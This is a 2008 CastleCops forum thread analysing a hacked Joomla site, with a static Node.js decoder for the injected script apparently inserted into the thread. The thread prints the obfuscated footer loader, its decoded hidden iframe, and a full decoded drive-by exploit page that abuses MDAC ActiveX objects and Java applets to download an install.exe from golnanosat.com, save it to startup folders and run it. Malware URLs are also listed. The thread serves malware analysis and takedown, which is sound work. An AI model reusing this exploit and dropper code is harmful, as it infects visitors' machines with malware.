CastleCops, Internet Crime Fighters

best-pool.com

cconniejean

Trooper


Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Fri Apr 11, 2008 2:28 am    Post subject: best-pool.com

Code:
http://www.best-pool.com/


AVG trojan alerts and LinkScanner alerts.
LinkScanner Online has found
[MDAC ActiveX code execution (CVE-2006-0003)]

Not sure if this is a site that has been compromised or just a bad one.

philipp2

Trooper


Joined: Apr 11, 2008
Posts: 22
Location: Germany

Posted: Fri Apr 11, 2008 3:44 pm    Post subject:

Hi,
There is a hidden iframe on this site. Since it is a Joomla installation I suppose the website has been 'hacked'. But who knows...
Anyway, in the source we can find this piece of JavaScript in the footer:

Code:

<script>var data=unescape("%7B%14%04%15%0E%17%13g%2B%26%29%202%26%20%22ze%0D%261%26%14%245.73eyg%23%28%242%2A%22%293i05.3%22o%60%7B.%215%26%2A%22g45%24ze%2F337%7Dhh1.7%264%283%2C%26i%24%28%2Ah.%29i7%2F7x%26%231zrwsva1%26%2Bzspq%25s%24%7F%26eg43%3E%2B%22ze%23.47%2B%26%3E%7D%29%28%29%22ey%7Bh.%215%26%2A%22y%60n%7Cg%7Bh%14%04%15%0E%17%13y");var dec="";for(idx=0;idx<data.length;idx++){dec+=String.fromCharCode(data.charCodeAt(idx)^71);}document.write(unescape(dec));</script>

which decodes to
Code:

<SCRIPT language="JavaScript">document.write('<iframe src="http://vipasotka.com/in.php?adv=5041&val=476b4c8a" style="display:none"></iframe>');
</SCRIPT>

The visitor is then redirected from http://vipasotka.com/in.php?adv=5041&val=476b4c8a to http://golnanosat.com/in.php?adv=5041&val=476b4c8a
Here we find another piece of obfuscated JavaScript:

Decoded:
Code:

<HTML><div id=testobj></div>
<SCRIPT Language="javascript" type="text/javascript">
function lsrn(lev3par1){
var exes="\\mmzp.exe"
var url="http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=1";var stxml="XML";var stgt="GET";var std="D";var ldobj=null;
try{ldobj=objmker(lev3par1,"Microsoft."+stxml+"HTTP");ldobj.open(stgt,url,false);
}catch(e){try{ldobj=objmker(lev3par1,"MS"+stxml+"2."+stxml+"HTTP");ldobj.open(stgt,url,false);
}catch(e){try{ldobj=objmker(lev3par1,"MS"+stxml+"2.Server"+stxml+"HTTP");
ldobj.open(stgt,url,false);}catch(e){try{ldobj=new XMLHttpRequest();ldobj.open(stgt,url,false);}catch(e){return 0;}}}}
try{ldobj.send(null);}catch(e){try{ldobj.send(null);}catch(e){return 0;};};
ldbody = ldobj.responseBody;var obj_strm=objmker(lev3par1,"A"+std+"O"+std+"B.Stream");
if(obj_strm){obj_strm.Type=1;obj_strm.Mode=3;obj_strm.Open();obj_strm.Write(ldbody);
var hdrive="";var dtemp="";var dstart="";var daustart="";
try{var obj_WScript=objmker(lev3par1,"WScript.Shell");
try{var wshProcEnv=obj_WScript.Environment("PROCESS");hdrive=wshProcEnv("HOMEDRIVE");dtemp=wshProcEnv("TEMP");}catch(e){};
try{dstart=obj_WScript.SpecialFolders("Startup");daustart=obj_WScript.SpecialFolders("AllUsersStartup");}catch(e){};}catch(e){};
if(hdrive==""){hdrive="C:";};if(dtemp==""){try{var obj_fso=objmker(lev3par1,"Scripting.FileSystemObject");dtemp=obj_fso.GetSpecialFolder(2);}catch(e){};};var fnex="";var fn="";if(fnex==""){if(daustart!=""){try{fn=daustart+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};};
if(fnex==""){if(dstart!=""){try { fn=dstart+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Inicio\\Programas\\Inicio"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menuen Start\\Programmer\\Start"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programma\\'s\\Opstarten"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Avvio\\Programmi\\Esecuzione automatica"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programlar\\BASLANGIC"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start-meny\\Programmer\\Oppstart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start-menyn\\Program\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Iniciar"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Dokumente und Einstellungen\\All Users\\Startmenu\\Programme\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=dtemp+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:\\RECYCLER"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:\\RECYCLED"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex!=""){try{var obj_shl=objmker(lev3par1, "Shell.Application");obj_shl.ShellExecute(fnex);}catch(e){try{obj_WScript.Exec(fnex);}catch(e){
try{var obj2mk="testobj"+".innerHTML"+"=testobj"+".innerHTML"+"+\"<object"+" classid"+"='clsid:"+"527196a4-b1a3-4647-931d-37ba5af23037"+"' codebase="+"'\"+fnex+\"'></"+"object>\";";
eval(obj2mk);}catch(e){return 0;};};};return 1;}else{return 0;};};};
var i=0;var hncx=new Array("{BD96C"+"556-65A"+"3-11D0-9"+"83A-00C04"+"FC2"+"9E36}","{"+"AB9BC"+"EDD-E"+"C7E-47"+"E1-9322"+"-D4A2"+"1061"+"7116}","{0"+"006F033-0000-000"+"0-C0"+"00-0000000"+"000"+"46}", "{0006"+"F03A-0000-"+"0000-C000-"+"0000"+"000000"+"46}", "{6e32070"+"a-76"+"6d-4ee6-879c-d"+"c1fa91d2f"+"c3}", "{6414512B-B"+"978-451D-A0D8-F"+"CF"+"DF33E83"+"3C}", "{7F5B7"+"F63-F06F"+"-4331-8A26-339E03"+"C0AE"+"3D}", "{06723E09-F4C2-43"+"c8-8358-09FC"+"D1DB0766}", "{639"+"F725F-1B2D-48"+"31-"+"A9FD-8"+"7484768"+"2010}", "{B"+"A018599-1DB3-44f9-83B"+"4-461454C8"+"4BF8}", "{D0C07D5"+"6-7C69-"+"43F1-B4A0-2"+"5F5A11FAB1"+"9}", "{E8"+"CCCDDF-CA28-496b-"+"B050-6C07C"+"96247"+"6B}",null);
good=0; while(hncx[i]){var iuump=null;if(hncx[i].substring(0,1)=="{"){iuump=document.createElement("object");iuump.setAttribute("id","obj_RDS"+i);iuump.setAttribute("classid","clsid:"+hncx[i].substring(1,hncx[i].length-1));}if(iuump){try{if(lsrn(iuump)){break;};}catch(e){}}i++;}
function objmker(lev2par1, lev2par2){var nobj=null;try{eval('nobj=lev2par1.CreateObject(lev2par2)');}catch(e){}
if(!nobj){try{eval('nobj=lev2par1.CreateObject(lev2par2,"")');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.CreateObject(lev2par2,"","")'); }catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject("",lev2par2)');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject(lev2par2,"")');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject(lev2par2)');}catch(e){}}return(nobj);
}document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");try {
var unsafeclass=document.maniman.getClass().forName("sun.misc.Unsafe");
var unsafemeth=unsafeclass.getMethod("getUnsafe",null);var unsafe=unsafemeth.invoke(unsafemeth,null);
document.maniman.foobar(unsafe);var chenref=unsafe.defineClass("omfg",document.maniman.luokka,0,document.maniman.classSize);
var chen=unsafe.allocateInstance(chenref);chen.setURLdl("http://golnanosat.com/adw_files/5000/e18d59cb/install.exe");chen.setUname("5000");chen.setCID("other");}catch(d){}
document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");document.write("<param name=usid value=us0105>");
document.write("<param name=linkurl value=\"http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=3\"></applet>");
document.write("<applet archive=\"ms03011.jar\" code=\"MagicApplet.class\" width=1  height=1>");
document.write("<param name=\"ModulePath\" value=\"http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=4\"></applet>");
</SCRIPT></body></html>


I didn't analyse the behaviour of the malware (install.exe) itself, just decoded the JavaScript. But perhaps I'll find some time later on.

regards
philipp

Edit: removed one code section of obfuscated JavaScript, because it was destroying the page layout.
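The footer script above hides its payload behind two cheap layers: percent-encoding undone by unescape(), then a per-character XOR with 71. The following is an added example (not part of philipp2's post or of the CastleCops site) showing how to reverse that layer statically, without executing the page's JavaScript, and how to pull out any hidden iframe targets for triage. It runs under Node.js; the sample input is the footer script as quoted in the thread, embedded here as a string, and the function and variable names are this example's own.

```javascript
// Added example: static decoder for the "unescape(...) ^ KEY" obfuscation seen
// on the compromised page. Nothing from the sample is evaluated; the decode is
// reproduced with plain string operations so it is safe to run on saved HTML.

// Constructed sample: the footer <script> exactly as quoted in the thread.
const SAMPLE_SCRIPT = '<script>var data=unescape("%7B%14%04%15%0E%17%13g%2B%26%29%202%26%20%22ze%0D%261%26%14%245.73eyg%23%28%242%2A%22%293i05.3%22o%60%7B.%215%26%2A%22g45%24ze%2F337%7Dhh1.7%264%283%2C%26i%24%28%2Ah.%29i7%2F7x%26%231zrwsva1%26%2Bzspq%25s%24%7F%26eg43%3E%2B%22ze%23.47%2B%26%3E%7D%29%28%29%22ey%7Bh.%215%26%2A%22y%60n%7Cg%7Bh%14%04%15%0E%17%13y");var dec="";for(idx=0;idx<data.length;idx++){dec+=String.fromCharCode(data.charCodeAt(idx)^71);}document.write(unescape(dec));</script>';

// Locate the encoded blob and the XOR key in the loader without running it.
// Pattern: unescape("<percent-encoded>") ... charCodeAt(<expr>)^<key>
function extractXorLayer(scriptText) {
  const dataMatch = scriptText.match(/unescape\("([^"]*)"\)/);
  const keyMatch = scriptText.match(/charCodeAt\([^)]*\)\s*\^\s*(\d+)/);
  if (!dataMatch || !keyMatch) return null;
  return { data: dataMatch[1], key: parseInt(keyMatch[1], 10) };
}

// Reproduce the loader's decode: expand %XX sequences the same way the
// browser's unescape() does, then XOR every code unit with the key.
function xorDecode(encoded, key) {
  const raw = unescape(encoded);
  let out = '';
  for (let i = 0; i < raw.length; i++) {
    out += String.fromCharCode(raw.charCodeAt(i) ^ key);
  }
  return out;
}

// Report every <iframe> in the decoded markup, flagging the ones styled or
// sized so the visitor never sees them (the classic drive-by indicator).
function findHiddenIframes(html) {
  const results = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = attrs.match(/src\s*=\s*["']([^"']+)["']/i);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*=\s*["']?0\b/i.test(attrs);
    if (src) results.push({ src: src[1], hidden });
  }
  return results;
}

// Full triage of one script block: key, decoded text, and iframe targets.
function analyse(scriptText) {
  const layer = extractXorLayer(scriptText);
  if (!layer) return { key: null, decoded: null, iframes: [] };
  const decoded = xorDecode(layer.data, layer.key);
  return { key: layer.key, decoded, iframes: findHiddenIframes(decoded) };
}

// Stand-alone run: print what the footer script would have written.
const report = analyse(SAMPLE_SCRIPT);
console.log('XOR key:', report.key);
console.log('Decoded:', report.decoded);
for (const f of report.iframes) {
  console.log((f.hidden ? 'HIDDEN iframe -> ' : 'iframe -> ') + f.src);
}
```

The same two regexes will catch any copy of this loader that varies only the key or the blob, which is how such injections usually differ from site to site; a loader that changes the decoding arithmetic needs the decode function adjusted to match.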

cconniejean

Trooper


Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Fri Apr 11, 2008 8:49 pm    Post subject:

Thank you, I recognize "vipasotka" and "golnanosat" from security blogs.

tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

Posted: Sat Apr 12, 2008 3:51 pm    Post subject:

Code:
http://golnanosat.com/adw_files/5000/e18d59cb/install.exe


Code:
http://golnanosat.com/ms03011.jar


Code:
http://golnanosat.com/OP.jar



Any new malware will be added to the malware listserv.


_________________
Got Windows XP? Help protect your PC from malware with Microsoft's anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx